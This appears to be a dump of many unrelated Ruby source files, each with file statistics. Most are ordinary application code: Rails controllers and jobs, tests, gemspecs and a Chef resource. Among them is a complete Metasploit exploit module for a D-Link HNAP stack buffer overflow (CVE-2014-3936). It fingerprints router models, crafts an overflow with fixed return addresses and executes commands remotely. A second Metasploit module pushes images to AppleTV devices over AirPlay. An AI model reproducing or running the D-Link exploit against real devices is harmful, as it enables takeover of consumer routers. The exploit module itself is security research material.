# s.preserve_paths = "FilesToSave", "MoreFilesToSave"
# ――― Project Linking ―――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# Link your library with frameworks, or libraries. Libraries do not include
# the lib prefix of their name.
#
# s.framework = "SomeFramework"
# s.frameworks = "SomeFramework", "AnotherFramework"
# s.library = "iconv"
# s.libraries = "iconv", "xml2"
# ――― Project Settings ――――――――――――――――――――――――――――――――――――――――――――――――――――――――― #
#
# If your library depends on compiler flags you can set them in the xcconfig hash
# where they will only apply to your library. If you depend on other Podspecs
# you can include multiple dependencies to ensure it works.
# s.requires_arc = true
# s.xcconfig = { "HEADER_SEARCH_PATHS" => "$(SDKROOT)/usr/include/libxml2" }
# s.dependency "JSONKit", "~> 1.4"
end
| 36.647482 | 122 | 0.599333 |
0352c24757e39e8f75937b9f75a7a8efab041030 | 970 | class LoadNewItemJob < ApplicationJob
queue_as :default
def perform(new_news_location, hn_story_id)
begin
story_json = JSON.parse HTTP.get("https://hacker-news.firebaseio.com/v0/item/#{hn_story_id}.json?print=pretty").to_s
if story_json.nil?
return
end
item = Item.where(hn_id: hn_story_id).first_or_create
item.populate(story_json)
item.save
new_item = NewItem.where(location: new_news_location).first_or_create
new_item.item = item
new_item.save
ActionCable.server.broadcast "NewItemChannel:#{new_item.location}", {
message: NewsController.render( new_item.item ).squish,
location: new_item.location
}
ActionCable.server.broadcast "ItemsListChannel:#{new_item.item.id}", {
item: ItemsController.render( new_item.item ).squish,
item_id: new_item.item.id
}
rescue URI::InvalidURIError => error
logger.error error
end
end
end
| 31.290323 | 122 | 0.686598 |
ed901f1a184a58b2d57a036f9bc1b29097623fb6 | 622 | require 'test_helper'
describe CacheWarp do
before do
WebMock.allow_net_connect!
end
after do
WebMock.disable_net_connect!
end
describe "when cachewarp hits http://www.akamai.com/" do
it "should report it as cached" do
uri = 'http://www.akamai.com/'
command = "bundle exec cachewarp #{uri} --quiet"
assert(system(command))
end
end
describe "when cachewarp hits http://www.google.com/" do
it "should report it as not cached" do
uri = 'http://www.google.com/'
command = "bundle exec cachewarp #{uri} --quiet"
refute(system(command))
end
end
end | 23.037037 | 58 | 0.655949 |
1c38d28c4fdf8e6da6288d865ce1a21f84bae18d | 973 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'run_shell/version'
Gem::Specification.new do |spec|
spec.name = "run_shell"
spec.version = RunShell::VERSION
spec.authors = ["bruce"]
spec.email = ["[email protected]"]
spec.summary = %q{run shell}
spec.description = %q{run shell }
spec.homepage = ""
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.executables = spec.files.grep(%r{^bin/}) { |f| File.basename(f) }
spec.test_files = spec.files.grep(%r{^(test|spec|features)/})
spec.require_paths = ["lib"]
spec.add_dependency 'activerecord', ['>= 3.0', '< 5.0']
spec.add_development_dependency "bundler", "~> 1.6"
spec.add_development_dependency "rake"
spec.add_development_dependency 'railties', ['>= 3.0', '< 5.0']
spec.add_development_dependency "rspec-rails", "~> 2.14"
end
| 34.75 | 74 | 0.633094 |
28736fea3cc944a21b5728e45ba1ea4c4791a6f5 | 2,287 | #
# Cookbook:: hashicorp-vault
# Resource:: config_listener
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
unified_mode true
%w(base item item_type).each { |t| use "partial/_config_hcl_#{t}" }
load_current_value do |new_resource|
case vault_mode
when :server
current_value_does_not_exist! unless ::File.exist?(new_resource.config_file)
options vault_hcl_config_current_load(config_file).dig(vault_hcl_config_type, new_resource.type)
when :agent
option_data = array_wrap(vault_hcl_config_current_load(new_resource.config_file, vault_hcl_config_type)).select { |l| l.keys.first.eql?(new_resource.type) }
current_value_does_not_exist! if nil_or_empty?(option_data)
raise Chef::Exceptions::InvalidResourceReference,
"Filter matched #{option_data.count} listener configuration items but only should match one." if option_data.count > 1
options option_data.first&.fetch(type)
end
if ::File.exist?(new_resource.config_file)
owner ::Etc.getpwuid(::File.stat(new_resource.config_file).uid).name
group ::Etc.getgrgid(::File.stat(new_resource.config_file).gid).name
mode ::File.stat(new_resource.config_file).mode.to_s(8)[-4..-1]
end
end
action :create do
converge_if_changed { vault_hcl_resource_template_add }
# We have to do this twice as the agent config file is accumulated and converge_if_changed won't always fire
vault_hcl_resource_template_add if new_resource.vault_mode.eql?(:agent)
end
action :delete do
case vault_mode
when :server
edit_resource(:file, new_resource.config_file) { action(:delete) } if ::File.exist?(new_resource.config_file)
when :agent
converge_by('Remove configuration from accumulator template') { vault_hcl_resource_template_remove } if vault_hcl_resource_template?
end
end
| 38.116667 | 160 | 0.771316 |
878fd4f8492d8af9a8e2b8c968864ad684b3e641 | 144 | $:.unshift File.expand_path("../../lib/table2png", __FILE__)
require 'bundler/setup'
require 'imgkit'
require 'chunky_png'
require 'table2png'
| 20.571429 | 60 | 0.743056 |
e286543767956b6f5c6621a7b463f15ac0699d3c | 10,352 | class PaypalAccountsController < ApplicationController
before_filter do |controller|
controller.ensure_logged_in t("layouts.notifications.you_must_log_in_to_view_your_settings")
end
before_filter :ensure_paypal_enabled
PaypalAccountForm = FormUtils.define_form("PaypalAccountForm")
DataTypePermissions = PaypalService::DataTypes::Permissions
def show
return redirect_to action: :new unless PaypalHelper.account_prepared_for_user?(@current_user.id, @current_community.id)
m_account = accounts_api.get(
community_id: @current_community.id,
person_id: @current_user.id
).maybe
@selected_left_navi_link = "payments"
community_ready_for_payments = PaypalHelper.community_ready_for_payments?(@current_community)
unless community_ready_for_payments
flash.now[:warning] = t("paypal_accounts.new.admin_account_not_connected",
contact_admin_link: view_context.link_to(
t("paypal_accounts.new.contact_admin_link_text"),
new_user_feedback_path)).html_safe
end
render(locals: {
community_ready_for_payments: community_ready_for_payments,
left_hand_navigation_links: settings_links_for(@current_user, @current_community),
paypal_account_email: m_account[:email].or_else(""),
paypal_account_state: m_account[:state].or_else(:not_connected),
change_url: ask_order_permission_person_paypal_account_path(@current_user)
})
end
def new
return redirect_to action: :show if PaypalHelper.account_prepared_for_user?(@current_user.id, @current_community.id)
m_account = accounts_api.get(
community_id: @current_community.id,
person_id: @current_user.id
).maybe
@selected_left_navi_link = "payments"
community_ready_for_payments = PaypalHelper.community_ready_for_payments?(@current_community)
unless community_ready_for_payments
flash.now[:warning] = t("paypal_accounts.new.admin_account_not_connected",
contact_admin_link: view_context.link_to(
t("paypal_accounts.new.contact_admin_link_text"),
new_user_feedback_path)).html_safe
end
community_currency = @current_community.default_currency
payment_settings = payment_settings_api.get_active(community_id: @current_community.id).maybe.get
community_country_code = LocalizationUtils.valid_country_code(@current_community.country)
render(locals: {
community_ready_for_payments: community_ready_for_payments,
left_hand_navigation_links: settings_links_for(@current_user, @current_community),
order_permission_action: ask_order_permission_person_paypal_account_path(@current_user),
billing_agreement_action: ask_billing_agreement_person_paypal_account_path(@current_user),
paypal_account_form: PaypalAccountForm.new,
paypal_account_state: m_account[:order_permission_state].or_else(""),
paypal_account_email: m_account[:email].or_else(""),
change_url: ask_order_permission_person_paypal_account_path(@current_user),
commission_from_seller: t("paypal_accounts.commission", commission: payment_settings[:commission_from_seller]),
minimum_commission: Money.new(payment_settings[:minimum_transaction_fee_cents], community_currency),
commission_type: payment_settings[:commission_type],
currency: community_currency,
create_url: "https://www.paypal.com/#{community_country_code}/signup",
upgrade_url: "https://www.paypal.com/#{community_country_code}/upgrade"
})
end
def ask_order_permission
return redirect_to action: :new unless PaypalHelper.community_ready_for_payments?(@current_community)
# Select paypal account connect flow
flow = use_new_connect_flow?(@current_community) ? :new : :old
callback_url = flow == :new ? paypal_connect_person_paypal_account_url : permissions_verified_person_paypal_account_url
community_country_code = LocalizationUtils.valid_country_code(@current_community.country)
response = accounts_api.request(
body: PaypalService::API::DataTypes.create_create_account_request(
{
community_id: @current_community.id,
person_id: @current_user.id,
callback_url: callback_url,
country: community_country_code
}),
flow: flow)
permissions_url = response.data[:redirect_url]
if permissions_url.blank?
flash[:error] = t("paypal_accounts.new.could_not_fetch_redirect_url")
return redirect_to action: :new
else
return redirect_to permissions_url
end
end
def ask_billing_agreement
return redirect_to action: :new unless PaypalHelper.community_ready_for_payments?(@current_community)
account_response = accounts_api.get(
community_id: @current_community.id,
person_id: @current_user.id
)
m_account = account_response.maybe
case m_account[:order_permission_state]
when Some(:verified)
response = accounts_api.billing_agreement_request(
community_id: @current_community.id,
person_id: @current_user.id,
body: PaypalService::API::DataTypes.create_create_billing_agreement_request(
{
description: t("paypal_accounts.new.billing_agreement_description"),
success_url: billing_agreement_success_person_paypal_account_url,
cancel_url: billing_agreement_cancel_person_paypal_account_url
}
))
billing_agreement_url = response.data[:redirect_url]
if billing_agreement_url.blank?
flash[:error] = t("paypal_accounts.new.could_not_fetch_redirect_url")
return redirect_to action: :new
else
return redirect_to billing_agreement_url
end
else
redirect_to action: ask_order_permission
end
end
def permissions_verified
unless params[:verification_code].present?
return flash_error_and_redirect_to_settings(error_msg: t("paypal_accounts.new.permissions_not_granted"))
end
response = accounts_api.create(
community_id: @current_community.id,
person_id: @current_user.id,
order_permission_request_token: params[:request_token],
body: PaypalService::API::DataTypes.create_account_permission_verification_request(
{
order_permission_verification_code: params[:verification_code]
}
),
flow: :old)
if response[:success]
redirect_to new_paypal_account_settings_payment_path(@current_user.username)
else
flash_error_and_redirect_to_settings(error_response: response) unless response[:success]
end
end
def paypal_connect
onboarding_params = params.slice(
:merchantId,
:merchantIdInPayPal,
:permissionsGranted,
:accountStatus,
:consentStatus,
:productIntentID,
:isEmailConfirmed,
:returnMessage)
response = accounts_api.create(
community_id: @current_community.id,
person_id: @current_user.id,
order_permission_request_token: nil,
body: PaypalService::API::DataTypes.create_account_permission_verification_request(
{
onboarding_params: onboarding_params,
}
),
flow: :new)
if response[:success]
redirect_to new_paypal_account_settings_payment_path(@current_user.username)
else
flash_error_and_redirect_to_settings(error_response: response) unless response[:success]
end
end
def billing_agreement_success
response = accounts_api.billing_agreement_create(
community_id: @current_community.id,
person_id: @current_user.id,
billing_agreement_request_token: params[:token]
)
if response[:success]
redirect_to show_paypal_account_settings_payment_path(@current_user.username)
else
case response.error_msg
when :billing_agreement_not_accepted
flash_error_and_redirect_to_settings(error_msg: t("paypal_accounts.new.billing_agreement_not_accepted"))
when :wrong_account
flash_error_and_redirect_to_settings(error_msg: t("paypal_accounts.new.billing_agreement_wrong_account"))
else
flash_error_and_redirect_to_settings(error_response: response)
end
end
end
def billing_agreement_cancel
accounts_api.delete_billing_agreement(
community_id: @current_community.id,
person_id: @current_user.id
)
flash[:error] = t("paypal_accounts.new.billing_agreement_canceled")
redirect_to new_paypal_account_settings_payment_path(@current_user.username)
end
private
# Before filter
def ensure_paypal_enabled
unless PaypalHelper.paypal_active?(@current_community.id)
flash[:error] = t("paypal_accounts.new.paypal_not_enabled")
redirect_to person_settings_path(@current_user)
end
end
def flash_error_and_redirect_to_settings(error_response: nil, error_msg: nil)
error_msg =
if (error_msg)
error_msg
elsif (error_response && error_response[:error_code] == "570058")
t("paypal_accounts.new.account_not_verified")
elsif (error_response && error_response[:error_code] == "520009")
t("paypal_accounts.new.account_restricted")
else
t("paypal_accounts.new.something_went_wrong")
end
flash[:error] = error_msg
redirect_to action: error_redirect_action
end
def error_redirect_action
if PaypalHelper.account_prepared_for_user?(@current_user.id, @current_community.id)
:show
else
:new
end
end
def payment_gateway_commission(community_id)
p_set =
Maybe(payment_settings_api.get_active(community_id: community_id))
.map {|res| res[:success] ? res[:data] : nil}
.select {|set| set[:payment_gateway] == :paypal }
.or_else(nil)
raise ArgumentError.new("No active paypal gateway for community: #{community_id}.") if p_set.nil?
p_set[:commission_from_seller]
end
# TODO Per community "Feature flag" for using new paypal account connect flow
def use_new_connect_flow?(community)
false
end
def paypal_minimum_commissions_api
PaypalService::API::Api.minimum_commissions
end
def payment_settings_api
TransactionService::API::Api.settings
end
def accounts_api
PaypalService::API::Api.accounts_api
end
end
| 35.452055 | 123 | 0.736862 |
2607f34dc2ea8fc77541d30a49e1f3aed97a4d81 | 305 | if ActiveRecord::VERSION::MAJOR == 4
require 'activerecord-postgresql-expression/active_record/schema_dumper'
require 'activerecord-postgresql-expression/active_record/connection_adapters/postgresql/schema_statements'
else
raise "activerecord-postgresql-expression supports activerecord ~> 4.x"
end
| 43.571429 | 109 | 0.839344 |
018c5f3287b4bd7155cac9049358d9c4e1c07248 | 2,814 | require File.expand_path('../boot', __FILE__)
require 'rails/all'
if defined?(Bundler)
# If you precompile assets before deploying to production, use this line
Bundler.require(*Rails.groups(:assets => %w(development test)))
# If you want your assets lazily compiled in production, use this line
# Bundler.require(:default, :assets, Rails.env)
end
module AdminDemo
class Application < Rails::Application
# Settings in config/environments/* take precedence over those specified here.
# Application configuration should go into files in config/initializers
# -- all .rb files in that directory are automatically loaded.
# Custom directories with classes and modules you want to be autoloadable.
# config.autoload_paths += %W(#{config.root}/extras)
# Only load the plugins named here, in the order given (default is alphabetical).
# :all can be used as a placeholder for all plugins not explicitly named.
# config.plugins = [ :exception_notification, :ssl_requirement, :all ]
# Activate observers that should always be running.
# config.active_record.observers = :cacher, :garbage_collector, :forum_observer
# Set Time.zone default to the specified zone and make Active Record auto-convert to this zone.
# Run "rake -D time" for a list of tasks for finding time zone names. Default is UTC.
# config.time_zone = 'Central Time (US & Canada)'
# The default locale is :en and all translations from config/locales/*.rb,yml are auto loaded.
# config.i18n.load_path += Dir[Rails.root.join('my', 'locales', '*.{rb,yml}').to_s]
# config.i18n.default_locale = :de
# Configure the default encoding used in templates for Ruby 1.9.
config.encoding = "utf-8"
# Configure sensitive parameters which will be filtered from the log file.
config.filter_parameters += [:password]
# Enable escaping HTML in JSON.
config.active_support.escape_html_entities_in_json = true
# Use SQL instead of Active Record's schema dumper when creating the database.
# This is necessary if your schema can't be completely dumped by the schema dumper,
# like if you have constraints or database-specific column types
# config.active_record.schema_format = :sql
# Enforce whitelist mode for mass assignment.
# This will create an empty whitelist of attributes available for mass-assignment for all models
# in your app. As such, your models will need to explicitly whitelist or blacklist accessible
# parameters by using an attr_accessible or attr_protected declaration.
config.active_record.whitelist_attributes = true
# Enable the asset pipeline
config.assets.enabled = true
# Version of your assets, change this if you want to expire all your assets
config.assets.version = '1.0'
end
end
| 44.666667 | 100 | 0.734542 |
9132e9db0ef457fcc5a44cfbbc09eb3fd82d1cea | 165 | def add(num1, num2)
num1 + num2
end
def multiply(num1, num2)
num1 * num2
end
puts add(2, 2) == 4
puts add(5, 4) == 9
puts multiply(add(2, 2), add(5, 4)) == 36
| 13.75 | 41 | 0.6 |
1a79b812df7670e35e9bd105ddd17ec5f6354d60 | 415 | require 'test_helper'
class GatewayTest < Test::Unit::TestCase
def test_offline_gateway
assert @gateway = ActiveMerchant::Billing::Gateway.factory(:offline)
assert_equal @gateway.display_name, "Offline"
end
def test_braintree_vault_gateway
assert @gateway = ActiveMerchant::Billing::Gateway.factory(:braintree_vault)
assert_equal @gateway.display_name, "Braintree (Blue Platform)"
end
end | 29.642857 | 80 | 0.773494 |
bbd038ac9356f016fdbd8708e4e6b28281b288f6 | 55 | class Link < ApplicationRecord
belongs_to :batch
end
| 13.75 | 30 | 0.8 |
62f500e8ebd8cc70c7db22301021e53be01ac9bb | 5,079 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = NormalRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::CmdStager
def initialize(info = {})
super(update_info(info,
'Name' => 'D-Link HNAP Request Remote Buffer Overflow',
'Description' => %q{
This module exploits an anonymous remote code execution vulnerability on different
D-Link devices. The vulnerability is due to an stack based buffer overflow while
handling malicious HTTP POST requests addressed to the HNAP handler. This module
has been successfully tested on D-Link DIR-505 in an emulated environment.
},
'Author' =>
[
'Craig Heffner', # vulnerability discovery and initial exploit
'Michael Messner <devnull[at]s3cur1ty.de>' # Metasploit module
],
'License' => MSF_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_MIPSBE,
'References' =>
[
['CVE', '2014-3936'],
['BID', '67651'],
['URL', 'http://www.devttys0.com/2014/05/hacking-the-d-link-dsp-w215-smart-plug/'], # blog post from Craig including PoC
['URL', 'http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10029']
],
'Targets' =>
[
#
# Automatic targeting via fingerprinting
#
[ 'Automatic Targeting', { 'auto' => true } ],
[ 'D-Link DSP-W215 - v1.0',
{
'Offset' => 1000000,
'Ret' => 0x405cac, # jump to system - my_cgi.cgi
}
],
[ 'D-Link DIR-505 - v1.06',
{
'Offset' => 30000,
'Ret' => 0x405234, # jump to system - my_cgi.cgi
}
],
[ 'D-Link DIR-505 - v1.07',
{
'Offset' => 30000,
'Ret' => 0x405c5c, # jump to system - my_cgi.cgi
}
]
],
'DisclosureDate' => 'May 15 2014',
'DefaultTarget' => 0))
deregister_options('CMDSTAGER::DECODER', 'CMDSTAGER::FLAVOR')
end
def check
begin
res = send_request_cgi({
'uri' => "/HNAP1/",
'method' => 'GET'
})
if res && [200, 301, 302].include?(res.code)
if res.body =~ /DIR-505/ && res.body =~ /1.07/
@my_target = targets[3] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body =~ /DIR-505/ && res.body =~ /1.06/
@my_target = targets[2] if target['auto']
return Exploit::CheckCode::Appears
elsif res.body =~ /DSP-W215/ && res.body =~ /1.00/
@my_target = targets[1] if target['auto']
return Exploit::CheckCode::Appears
else
return Exploit::CheckCode::Detected
end
end
rescue ::Rex::ConnectionError
return Exploit::CheckCode::Safe
end
Exploit::CheckCode::Unknown
end
def exploit
print_status("#{peer} - Trying to access the vulnerable URL...")
@my_target = target
check_code = check
unless check_code == Exploit::CheckCode::Detected || check_code == Exploit::CheckCode::Appears
fail_with(Failure::NoTarget, "#{peer} - Failed to detect a vulnerable device")
end
if @my_target.nil? || @my_target['auto']
fail_with(Failure::NoTarget, "#{peer} - Failed to auto detect, try setting a manual target...")
end
print_status("#{peer} - Exploiting #{@my_target.name}...")
execute_cmdstager(
:flavor => :echo,
:linemax => 185
)
end
def prepare_shellcode(cmd)
buf = rand_text_alpha_upper(@my_target['Offset']) # Stack filler
buf << rand_text_alpha_upper(4) # $s0, don't care
buf << rand_text_alpha_upper(4) # $s1, don't care
buf << rand_text_alpha_upper(4) # $s2, don't care
buf << rand_text_alpha_upper(4) # $s3, don't care
buf << rand_text_alpha_upper(4) # $s4, don't care
buf << [@my_target.ret].pack("N") # $ra
# la $t9, system
# la $s1, 0x440000
# jalr $t9 ; system
# addiu $a0, $sp, 0x28 # our command
buf << rand_text_alpha_upper(40) # Stack filler
buf << cmd # Command to execute
buf << "\x00" # NULL-terminate the command
end
def execute_command(cmd, opts)
shellcode = prepare_shellcode(cmd)
begin
res = send_request_cgi({
'method' => 'POST',
'uri' => "/HNAP1/",
'encode_params' => false,
'data' => shellcode
}, 5)
return res
rescue ::Rex::ConnectionError
fail_with(Failure::Unreachable, "#{peer} - Failed to connect to the web server")
end
end
end
| 33.196078 | 130 | 0.541642 |
032bc1af6872d0afa6bf37160330d4c65985f884 | 3,744 | ##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Apple TV Image Remote Control',
'Description' => %q(
This module will show an image on an AppleTV device for a period of time.
Some AppleTV devices are actually password-protected, in that case please
set the PASSWORD datastore option. For password brute forcing, please see
the module auxiliary/scanner/http/appletv_login.
),
'Author' =>
[
'0a29406d9794e4f9b30b3c5d6702c708', # Original work
'sinn3r' # You can blame me for mistakes
],
'References' =>
[
['URL', 'http://nto.github.io/AirPlay.html']
],
'DefaultOptions' => { 'HttpUsername' => 'AirPlay' },
'License' => MSF_LICENSE
))
# Make the PASSWORD option more visible and hope the user is more aware of this option
register_options([
Opt::RPORT(7000),
OptInt.new('TIME', [true, 'Time in seconds to show the image', 10]),
OptPath.new('FILE', [true, 'Image to upload and show']),
OptString.new('HttpPassword', [false, 'The password for AppleTV AirPlay'])
])
# We're not actually using any of these against AppleTV in our Rex HTTP client init,
# so deregister them so we don't overwhelm the user with fake options.
deregister_options(
'HTTP::uri_encode_mode', 'HTTP::uri_full_url', 'HTTP::pad_method_uri_count',
'HTTP::pad_uri_version_count', 'HTTP::pad_method_uri_type', 'HTTP::pad_uri_version_type',
'HTTP::method_random_valid', 'HTTP::method_random_invalid', 'HTTP::method_random_case',
'HTTP::uri_dir_self_reference', 'HTTP::uri_dir_fake_relative', 'HTTP::uri_use_backslashes',
'HTTP::pad_fake_headers', 'HTTP::pad_fake_headers_count', 'HTTP::pad_get_params',
'HTTP::pad_get_params_count', 'HTTP::pad_post_params', 'HTTP::pad_post_params_count',
'HTTP::uri_fake_end', 'HTTP::uri_fake_params_start', 'HTTP::header_folding',
'NTLM::UseNTLM2_session', 'NTLM::UseNTLMv2', 'NTLM::SendLM', 'NTLM::SendNTLM',
'NTLM::SendSPN', 'NTLM::UseLMKey', 'DOMAIN', 'DigestAuthIIS', 'VHOST'
)
end
#
# Sends an image request to AppleTV. HttpClient isn't used because we actually need to keep
# the connection alive so that the video can keep playing.
#
def send_image_request(opts)
http = nil
http = Rex::Proto::Http::Client.new(
rhost,
rport.to_i,
{
'Msf' => framework,
'MsfExploit' => self
},
ssl,
ssl_version,
proxies,
datastore['HttpUsername'],
datastore['HttpPassword']
)
add_socket(http)
http.set_config('agent' => datastore['UserAgent'])
req = http.request_raw(opts)
res = http.send_recv(req)
Rex.sleep(datastore['TIME']) if res.code == 200
http.close
res
end
def get_image_data
File.open(datastore['FILE'], 'rb') { |f| f.read(f.stat.size) }
end
def show_image
image = get_image_data
opts = {
'method' => 'PUT',
'uri' => '/photo',
'data' => image
}
res = send_image_request(opts)
if !res
print_status("The connection timed out")
elsif res.code == 200
print_status("Received HTTP 200")
else
print_error("The request failed due to an unknown reason")
end
end
def run
print_status("Image request sent. Duration set: #{datastore['TIME']} seconds")
show_image
end
end
| 31.2 | 97 | 0.633814 |
38a9345d802fb0749ffa475d809aa03ad902e183 | 1,812 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Mutations::Boards::Issues::IssueMoveList do
let_it_be(:group) { create(:group, :public) }
let_it_be(:project) { create(:project, group: group) }
let_it_be(:board) { create(:board, group: group) }
let_it_be(:epic) { create(:epic, group: group) }
let_it_be(:user) { create(:user) }
let_it_be(:issue1) { create(:labeled_issue, project: project, relative_position: 3) }
let_it_be(:existing_issue1) { create(:labeled_issue, project: project, relative_position: 10) }
let_it_be(:existing_issue2) { create(:labeled_issue, project: project, relative_position: 50) }
let(:mutation) { described_class.new(object: nil, context: { current_user: user }, field: nil) }
let(:params) { { board: board, project_path: project.full_path, iid: issue1.iid } }
let(:move_params) do
{
epic_id: epic.to_global_id,
move_before_id: existing_issue2.id,
move_after_id: existing_issue1.id
}
end
before do
stub_licensed_features(epics: true)
project.add_maintainer(user)
end
subject do
mutation.resolve(**params.merge(move_params))
end
describe '#resolve' do
context 'when user has access to the epic' do
before do
group.add_developer(user)
end
it 'moves and repositions issue' do
subject
expect(issue1.reload.epic).to eq(epic)
expect(issue1.relative_position).to be < existing_issue2.relative_position
expect(issue1.relative_position).to be > existing_issue1.relative_position
end
end
context 'when user does not have access to the epic' do
it 'does not update issue' do
subject
expect(issue1.reload.epic).to be_nil
expect(issue1.relative_position).to eq(3)
end
end
end
end
| 30.711864 | 98 | 0.690949 |
ed8c316b7bddd6cf4887d8769e666ea4ffe776a4 | 948 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'nouislider/rails/version'
Gem::Specification.new do |spec|
spec.name = "nouislider-rails"
spec.version = Nouislider::Rails::VERSION
spec.authors = ["Charles Lee"]
spec.email = ["[email protected]"]
spec.summary = "nouislider.js for the Rails asset pipeline."
spec.description = "Currently tracking #{Nouislider::Rails::VERSION} of noUiSlider: https://github.com/leongersen/noUiSlider). All credit and thanks to @leongersen for the awesome library."
spec.homepage = "https://github.com/chug2k/nouislider-rails"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0")
spec.require_paths = ["lib"]
spec.add_dependency "railties", ">= 3.1"
spec.add_development_dependency "bundler", "~> 1.5"
spec.add_development_dependency "rake"
end
| 41.217391 | 193 | 0.681435 |
79556cd0e960eba82e4c169e07715a02691ad601 | 789 | # This file should contain all the record creation needed to seed the database with its default values.
# The data can then be loaded with the rails db:seed command (or created alongside the database with db:setup).
#
# Examples:
#
# movies = Movie.create([{ name: 'Star Wars' }, { name: 'Lord of the Rings' }])
# Character.create(name: 'Luke', movie: movies.first)
User.create!(name: "Example User",
email: "[email protected]",
password: "foobar",
password_confirmation: "foobar",
admin: true,
activated: true,
activated_at: Time.zone.now)
99.times do |n|
name = Faker::Name.name
email = "example-#{n+1}@railstutorial.org"
password = "password"
User.create!(name: name, email: email, password: password, password_confirmation: password)
end | 39.45 | 111 | 0.700887 |
d51b7e661901c51633345efe4a35944c4abb9c1d | 2,319 | # spin.rb --
#
# This demonstration script creates several spinbox widgets.
#
# based on Tcl/Tk8.4.4 widget demos
if defined?($spin_demo) && $spin_demo
$spin_demo.destroy
$spin_demo = nil
end
$spin_demo = TkToplevel.new {|w|
title("Spinbox Demonstration")
iconname("spin")
positionWindow(w)
}
base_frame = TkFrame.new($spin_demo).pack(:fill=>:both, :expand=>true)
TkLabel.new(base_frame,
:font=>$font, :wraplength=>'5i', :justify=>:left,
:text=><<EOL).pack(:side=>:top)
Three different spin-boxes are displayed below. \
You can add characters by pointing, clicking and typing. \
The normal Motif editing characters are supported, along with \
many Emacs bindings. For example, Backspace and Control-h \
delete the character to the left of the insertion cursor and \
Delete and Control-d delete the chararacter to the right of the \
insertion cursor. For values that are too large to fit in the \
window all at once, you can scan through the value by dragging \
with mouse button2 pressed. Note that the first spin-box will \
only permit you to type in integers, and the third selects from \
a list of Australian cities.
If your Tk library linked to Ruby doesn't include a 'spinbox' widget, \
this demo doesn't work. Please use later version of Tk \
which supports a 'spinbox' widget.
EOL
TkFrame.new(base_frame){|f|
pack(:side=>:bottom, :fill=>:x, :pady=>'2m')
TkButton.new(f, :text=>'Dismiss', :width=>15, :command=>proc{
$spin_demo.destroy
$spin_demo = nil
}).pack(:side=>:left, :expand=>true)
TkButton.new(f, :text=>'See Code', :width=>15, :command=>proc{
showCode 'spin'
}).pack(:side=>:left, :expand=>true)
}
australianCities = [
'Canberra', 'Sydney', 'Melbourne', 'Perth', 'Adelaide',
'Brisbane', 'Hobart', 'Darwin', 'Alice Springs'
]
[
TkSpinbox.new(base_frame, :from=>1, :to=>10, :width=>10, :validate=>:key,
:validatecommand=>[
proc{|s| s == '' || /^[+-]?\d+$/ =~ s }, '%P'
]),
TkSpinbox.new(base_frame, :from=>0, :to=>3, :increment=>0.5,
:format=>'%05.2f', :width=>10),
TkSpinbox.new(base_frame, :values=>australianCities, :width=>10)
].each{|sbox| sbox.pack(:side=>:top, :pady=>5, :padx=>10)}
| 35.136364 | 75 | 0.640362 |
33835b141bfc31b6510fc3c959d7c93131f25220 | 721 | Pod::Spec.new do |s|
s.name = 'S2GeometrySwift'
s.version = '1.0.2'
s.license= { :type => 'MIT', :file => 'LICENSE' }
s.summary = 'S2 Geometry library in Swift.'
s.description = 'Swift port of S2 Geometry by Google.'
s.homepage = 'https://github.com/philip-bui/s2-geometry-swift'
s.author = { 'Philip Bui' => '[email protected]' }
s.source = { :git => 'https://github.com/philip-bui/s2-geometry-swift.git', :tag => s.version }
s.documentation_url = 'https://github.com/philip-bui/s2-geometry-swift'
s.ios.deployment_target = '8.0'
s.osx.deployment_target = '10.9'
s.tvos.deployment_target = '9.0'
s.watchos.deployment_target = '2.0'
s.source_files = 'Sources/Classes/**/*'
end
| 37.947368 | 97 | 0.662968 |
4aa474437ff1a61ffae220cc232d3c8d6f1b275e | 123 | class RemoveNsfFormFrom18fGsa < ActiveRecord::Migration
def change
remove_column :gsa18f_events, :nfs_form
end
end
| 20.5 | 55 | 0.796748 |
2662588e1bf8a7ddc4ef8a4407cfd39f1bd86071 | 45 | module Abuelo
VERSION = '0.1.0'.freeze
end
| 11.25 | 26 | 0.688889 |
286f2349efe816c7a16f6557d1765e15ffc957f7 | 2,820 | When(/^I upload a (\S+) file to \/(\S+)$/) do |size, uri|
FileGenerator.with_lorem_file(convert_size(size)) do |file|
S3Client[:source].s3_params = S3Manager.parse_s3_params(uri)
S3Client[:source].expected_size = file.size
S3Manager[:source].upload(file)
S3Client[:source].actual_size = S3Manager[:source].object_size
end
end
When(/^I upload a (\S+) file to \/(\S+) with curl$/) do |size, uri|
FileGenerator.with_lorem_file(convert_size(size)) do |file|
S3Client[:source].s3_params = S3Manager.parse_s3_params(uri)
S3Client[:source].expected_size = file.size
`curl -s -X POST -i http://localhost:10001/#{S3Client[:source].s3_params[0]} \
-F "Content-Type=multipart/form-data" \
-F "key=#{S3Client[:source].s3_params[1]}" \
-F "success_action_status=201" \
-F "file=@#{file.path}"`
S3Client[:source].actual_size = S3Manager[:source].object_size
end
end
When(/^I download a file from \/(\S+)$/) do |uri|
FileGenerator.with_empty_file do |file|
S3Client[:source].s3_params = S3Manager.parse_s3_params(uri)
